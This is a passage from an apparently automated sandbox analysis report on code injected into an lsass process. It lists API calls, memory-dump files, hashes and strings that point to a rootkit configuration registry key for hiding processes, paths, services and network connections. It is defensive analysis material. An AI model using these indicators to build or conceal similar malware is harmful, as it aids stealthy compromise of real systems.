PathFindFileNameW.SHLWAPI ref: 0000017D2DD53A44

Part of subcall function 0000017D2DD53F88: StrCmpNIW.SHLWAPI(?,?,?,0000017D2DD5272F), ref: 0000017D2DD53FA0

Part of subcall function 0000017D2DD53EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,0000017D2DD53A5B), ref: 0000017D2DD53EDB
Part of subcall function 0000017D2DD53EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000017D2DD53A5B), ref: 0000017D2DD53F0E
Part of subcall function 0000017D2DD53EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000017D2DD53A5B), ref: 0000017D2DD53F2E
Part of subcall function 0000017D2DD53EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000017D2DD53A5B), ref: 0000017D2DD53F47
Part of subcall function 0000017D2DD53EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000017D2DD53A5B), ref: 0000017D2DD53F68

CreateThread.KERNELBASE ref: 0000017D2DD53A8B

Part of subcall function 0000017D2DD51E74: GetCurrentThread.KERNEL32 ref: 0000017D2DD51E7F
Part of subcall function 0000017D2DD51E74: CreateThread.KERNELBASE ref: 0000017D2DD52043
Part of subcall function 0000017D2DD51E74: TlsAlloc.KERNEL32 ref: 0000017D2DD52049
Part of subcall function 0000017D2DD51E74: TlsAlloc.KERNEL32 ref: 0000017D2DD52055
Part of subcall function 0000017D2DD51E74: TlsAlloc.KERNEL32 ref: 0000017D2DD52061
Part of subcall function 0000017D2DD51E74: TlsAlloc.KERNEL32 ref: 0000017D2DD5206D
Part of subcall function 0000017D2DD51E74: TlsAlloc.KERNEL32 ref: 0000017D2DD52079
Part of subcall function 0000017D2DD51E74: TlsAlloc.KERNEL32 ref: 0000017D2DD52085

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
String ID:
API String ID: 2779030803-0
Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction ID: e2bbf7035cdc9e916597a18426b5085288f4986e6ebd83389e25a87e83549494
Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction Fuzzy Hash: 0C119E3161CF4983FB70A760B9493D962B0AF54345F4C0219958E811D7EFBEC4DB8640

Function 0000017D2DD22EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 0000017D2DD2302E

Memory Dump Source

Source File: 00000009.00000003.1782464858.0000017D2DD20000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000017D2DD20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_3_17d2dd20000_lsass.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction ID: 6b752afb91a17aad29154e99fbe11468da530b570cc38a148516e43257cf4422
Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction Fuzzy Hash: 6A912472B05B5887DB608F25E509BB9B3B1FB45B94F5880299E8D0778FDA38D883C710

Function 0000017D2DD51BC4 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000017D2DD51724: GetProcessHeap.KERNEL32 ref: 0000017D2DD5172F
Part of subcall function 0000017D2DD51724: HeapAlloc.KERNEL32 ref: 0000017D2DD5173E
Part of subcall function 0000017D2DD51724: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD517AE
Part of subcall function 0000017D2DD51724: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD517DB
Part of subcall function 0000017D2DD51724: RegCloseKey.ADVAPI32 ref: 0000017D2DD517F5
Part of subcall function 0000017D2DD51724: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD51815
Part of subcall function 0000017D2DD51724: RegCloseKey.ADVAPI32 ref: 0000017D2DD51830
Part of subcall function 0000017D2DD51724: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD51850
Part of subcall function 0000017D2DD51724: RegCloseKey.ADVAPI32 ref: 0000017D2DD5186B
Part of subcall function 0000017D2DD51724: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD5188B
Part of subcall function 0000017D2DD51724: RegCloseKey.ADVAPI32 ref: 0000017D2DD518A6
Part of subcall function 0000017D2DD51724: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD518C6

SleepEx.KERNELBASE ref: 0000017D2DD51BDF

Part of subcall function 0000017D2DD51724: RegCloseKey.ADVAPI32 ref: 0000017D2DD518E1
Part of subcall function 0000017D2DD51724: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD51901
Part of subcall function 0000017D2DD51724: RegCloseKey.ADVAPI32 ref: 0000017D2DD5191C
Part of subcall function 0000017D2DD51724: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD5193C
Part of subcall function 0000017D2DD51724: RegCloseKey.ADVAPI32 ref: 0000017D2DD51957
Part of subcall function 0000017D2DD51724: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD51977
Part of subcall function 0000017D2DD51724: RegCloseKey.ADVAPI32 ref: 0000017D2DD51992
Part of subcall function 0000017D2DD51724: RegCloseKey.ADVAPI32 ref: 0000017D2DD5199C

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: CloseOpen$Heap$AllocProcessSleep
String ID:
API String ID: 948135145-0
Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction ID: a513e6edbe1b9579d93716c2874b51edf92661d58ab9acfd5c96824e1f791f21
Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction Fuzzy Hash: 4731DD75208F4981FB509B26FE413F9B3B4AF44BC0F1C58219E0E8769BDEA5D8D38215

Function 0000017D2DD8C5D0 Relevance: 1.3, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapAlloc.KERNEL32(?,?,FFFFFFFD,0000017D2DD8E59F), ref: 0000017D2DD8C60E

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 82b16b63c06e435626d83e20f0b846010868506762bb036dd859b60ff1d78152
Instruction ID: 4f964bda7fd629f701282419e6a516bb0d39a9f232caa4f350fd376ce586ee1a
Opcode Fuzzy Hash: 82b16b63c06e435626d83e20f0b846010868506762bb036dd859b60ff1d78152
Instruction Fuzzy Hash: 81F01CB130EF4CC6FE665B6979423E512B49F847A1F6C6A319D2FD62D3DA2884C38610

Non-executed Functions

Function 0000017D2DD52FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256stringlibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 0000017D2DD53094
lstrlenW.KERNEL32 ref: 0000017D2DD532BE

Part of subcall function 0000017D2DD51A30: OpenProcess.KERNEL32 ref: 0000017D2DD51A56
Part of subcall function 0000017D2DD51A30: K32GetModuleFileNameExW.KERNEL32 ref: 0000017D2DD51A74
Part of subcall function 0000017D2DD51A30: PathFindFileNameW.SHLWAPI ref: 0000017D2DD51A83
Part of subcall function 0000017D2DD51A30: lstrlenW.KERNEL32 ref: 0000017D2DD51A8F
Part of subcall function 0000017D2DD51A30: StrCpyW.SHLWAPI ref: 0000017D2DD51AA2
Part of subcall function 0000017D2DD51A30: CloseHandle.KERNEL32 ref: 0000017D2DD51AB0

GetProcAddress.KERNEL32 ref: 0000017D2DD530A9

Part of subcall function 0000017D2DD53F88: StrCmpNIW.SHLWAPI(?,?,?,0000017D2DD5272F), ref: 0000017D2DD53FA0

StrCmpNIW.SHLWAPI ref: 0000017D2DD530EC
lstrlenW.KERNEL32 ref: 0000017D2DD53214

Strings

ntdll.dll, xrefs: 0000017D2DD5308D
\Device\Nsi, xrefs: 0000017D2DD530DF
NtQueryObject, xrefs: 0000017D2DD5309F

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: f2f135d611cdf066e5d6a521eba2869d786744282965d2fc11769e0904ffb0c5
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: D9B16C32218F9883EB658F65E500BE9A3B4FB45B84F485016EE8D53B96DEB5CDD2C340

Function 0000017D2DD82FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256stringlibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 0000017D2DD83094
lstrlenW.KERNEL32 ref: 0000017D2DD832BE

Part of subcall function 0000017D2DD81A30: OpenProcess.KERNEL32 ref: 0000017D2DD81A56
Part of subcall function 0000017D2DD81A30: K32GetModuleFileNameExW.KERNEL32 ref: 0000017D2DD81A74
Part of subcall function 0000017D2DD81A30: PathFindFileNameW.SHLWAPI ref: 0000017D2DD81A83
Part of subcall function 0000017D2DD81A30: lstrlenW.KERNEL32 ref: 0000017D2DD81A8F
Part of subcall function 0000017D2DD81A30: StrCpyW.SHLWAPI ref: 0000017D2DD81AA2
Part of subcall function 0000017D2DD81A30: CloseHandle.KERNEL32 ref: 0000017D2DD81AB0

GetProcAddress.KERNEL32 ref: 0000017D2DD830A9

Part of subcall function 0000017D2DD83F88: StrCmpNIW.SHLWAPI(?,?,?,0000017D2DD8272F), ref: 0000017D2DD83FA0

StrCmpNIW.SHLWAPI ref: 0000017D2DD830EC
lstrlenW.KERNEL32 ref: 0000017D2DD83214

Strings

\Device\Nsi, xrefs: 0000017D2DD830DF
NtQueryObject, xrefs: 0000017D2DD8309F
ntdll.dll, xrefs: 0000017D2DD8308D

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: aed3556e50d0393ba653c5c1e3761f2e9bc91c3f828265de547a951e2544783d
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: 19B17D32218B9883EB669F66E4007D9A3B4FB45B84F6C5016DE8DD3796DE35C983C340

Function 0000017D2DD584B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 0000017D2DD584CC
RtlCaptureContext.NTDLL ref: 0000017D2DD584F9
RtlLookupFunctionEntry.NTDLL ref: 0000017D2DD58513
RtlVirtualUnwind.NTDLL ref: 0000017D2DD58554
IsDebuggerPresent.KERNEL32 ref: 0000017D2DD585A8
SetUnhandledExceptionFilter.KERNEL32 ref: 0000017D2DD585C5
UnhandledExceptionFilter.KERNEL32 ref: 0000017D2DD585D0

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: 743912c070fe1f327d28e93256d600cb52e0adf25c8753936ac792564c150e2a
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: 1A311972209F8486EB608F60F8407EE6375FB88744F48442ADB4E47B9ADF78C589C750

Function 0000017D2DD884B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 0000017D2DD884CC
RtlCaptureContext.NTDLL ref: 0000017D2DD884F9
RtlLookupFunctionEntry.NTDLL ref: 0000017D2DD88513
RtlVirtualUnwind.NTDLL ref: 0000017D2DD88554
IsDebuggerPresent.KERNEL32 ref: 0000017D2DD885A8
SetUnhandledExceptionFilter.KERNEL32 ref: 0000017D2DD885C5
UnhandledExceptionFilter.KERNEL32 ref: 0000017D2DD885D0

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: b2e6777ee6f65e9a6b524049aa0a63c7e9474d6c7694a786e7f0fecff4889a0d
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: 6C314F72209F8486EB608F64F8407EE7374FB84748F58442ADA4E47B9ADF79C58AC710

Function 0000017D2DD5CD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 0000017D2DD5CE0B
RtlLookupFunctionEntry.NTDLL ref: 0000017D2DD5CE23
RtlVirtualUnwind.NTDLL ref: 0000017D2DD5CE5E
IsDebuggerPresent.KERNEL32 ref: 0000017D2DD5CE97
SetUnhandledExceptionFilter.KERNEL32 ref: 0000017D2DD5CEA1
UnhandledExceptionFilter.KERNEL32 ref: 0000017D2DD5CEAC

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: e05f22906aac1c5737550f033233ca4beb2db7fc8e70f9253c9fc50d3ade9d7f
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: 08415B36218F8486EB60CF25F8403DE73B4FB89794F580615EA9D46B9ADF78C196CB40

Function 0000017D2DD8CD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 0000017D2DD8CE0B
RtlLookupFunctionEntry.NTDLL ref: 0000017D2DD8CE23
RtlVirtualUnwind.NTDLL ref: 0000017D2DD8CE5E
IsDebuggerPresent.KERNEL32 ref: 0000017D2DD8CE97
SetUnhandledExceptionFilter.KERNEL32 ref: 0000017D2DD8CEA1
UnhandledExceptionFilter.KERNEL32 ref: 0000017D2DD8CEAC

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: d0ca0716c541df918f553f98406f679e98901f47d53c00d69067dd5262ecfbc5
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: 6E414C36218F8486E7618F25F8403DE73B4FB88794F580625EA8D47B9ADF38C196CB00

Function 0000017D2DD5DA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 0000017D2DD5DB99
FindNextFileW.KERNEL32 ref: 0000017D2DD5DCCF
FindClose.KERNEL32 ref: 0000017D2DD5DD0F
FindClose.KERNEL32 ref: 0000017D2DD5DD3B

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: f51d33f7841fded307b15e8a4b62ad0d3aa425269e7a372565180428a9a7dba0
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: 99A1A532708B8989FB20DB75B8407EE6BB1EB45794F1C4115DA9D27A9ADAB8C4C3C710

Function 0000017D2DD8DA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 0000017D2DD8DB99
FindNextFileW.KERNEL32 ref: 0000017D2DD8DCCF
FindClose.KERNEL32 ref: 0000017D2DD8DD0F
FindClose.KERNEL32 ref: 0000017D2DD8DD3B

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: 7153a92a0d4b10ed5544accc9fd8ce87a7b4799b68d4a6e65a20dddfeca3b9ae
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: 92A1A332708B885DFB229B75B8407ED6BB1AF457A4F2C4115DA9DA76DADA38C4C38700

Function 0000017D2DD51724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000017D2DD5172F
HeapAlloc.KERNEL32 ref: 0000017D2DD5173E

Part of subcall function 0000017D2DD51264: GetProcessHeap.KERNEL32 ref: 0000017D2DD5126A
Part of subcall function 0000017D2DD51264: HeapAlloc.KERNEL32 ref: 0000017D2DD51279
Part of subcall function 0000017D2DD51264: GetProcessHeap.KERNEL32 ref: 0000017D2DD51293
Part of subcall function 0000017D2DD51264: HeapAlloc.KERNEL32 ref: 0000017D2DD512A4

Part of subcall function 0000017D2DD51000: GetProcessHeap.KERNEL32 ref: 0000017D2DD51006
Part of subcall function 0000017D2DD51000: HeapAlloc.KERNEL32 ref: 0000017D2DD51015
Part of subcall function 0000017D2DD51000: GetProcessHeap.KERNEL32 ref: 0000017D2DD51028
Part of subcall function 0000017D2DD51000: HeapAlloc.KERNEL32 ref: 0000017D2DD51037

RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD517AE
RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD517DB
RegCloseKey.ADVAPI32 ref: 0000017D2DD517F5
RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD51815
RegCloseKey.ADVAPI32 ref: 0000017D2DD51830
RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD51850
RegCloseKey.ADVAPI32 ref: 0000017D2DD5186B
RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD5188B
RegCloseKey.ADVAPI32 ref: 0000017D2DD518A6
RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD518C6
RegCloseKey.ADVAPI32 ref: 0000017D2DD518E1
RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD51901
RegCloseKey.ADVAPI32 ref: 0000017D2DD5191C
RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD5193C
RegCloseKey.ADVAPI32 ref: 0000017D2DD51957
RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD51977
RegCloseKey.ADVAPI32 ref: 0000017D2DD51992
RegCloseKey.ADVAPI32 ref: 0000017D2DD5199C

Part of subcall function 0000017D2DD512B8: RegQueryInfoKeyW.ADVAPI32 ref: 0000017D2DD51315
Part of subcall function 0000017D2DD512B8: GetProcessHeap.KERNEL32 ref: 0000017D2DD51323
Part of subcall function 0000017D2DD512B8: HeapAlloc.KERNEL32 ref: 0000017D2DD51334
Part of subcall function 0000017D2DD512B8: RegEnumValueW.ADVAPI32 ref: 0000017D2DD51393
Part of subcall function 0000017D2DD512B8: GetProcessHeap.KERNEL32 ref: 0000017D2DD513DB
Part of subcall function 0000017D2DD512B8: HeapAlloc.KERNEL32 ref: 0000017D2DD513E9
Part of subcall function 0000017D2DD512B8: GetProcessHeap.KERNEL32 ref: 0000017D2DD51406
Part of subcall function 0000017D2DD512B8: HeapFree.KERNEL32 ref: 0000017D2DD51414
Part of subcall function 0000017D2DD512B8: lstrlenW.KERNEL32 ref: 0000017D2DD5141D
Part of subcall function 0000017D2DD512B8: GetProcessHeap.KERNEL32 ref: 0000017D2DD5142B
Part of subcall function 0000017D2DD512B8: HeapAlloc.KERNEL32 ref: 0000017D2DD51439

Strings

service_names, xrefs: 0000017D2DD518BF
tcp_local, xrefs: 0000017D2DD518FA
pid, xrefs: 0000017D2DD5180E
tcp_remote, xrefs: 0000017D2DD51935
udp, xrefs: 0000017D2DD51970
startup, xrefs: 0000017D2DD517D1
SOFTWARE\$nya-config, xrefs: 0000017D2DD5178E
paths, xrefs: 0000017D2DD51884
process_names, xrefs: 0000017D2DD51849

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
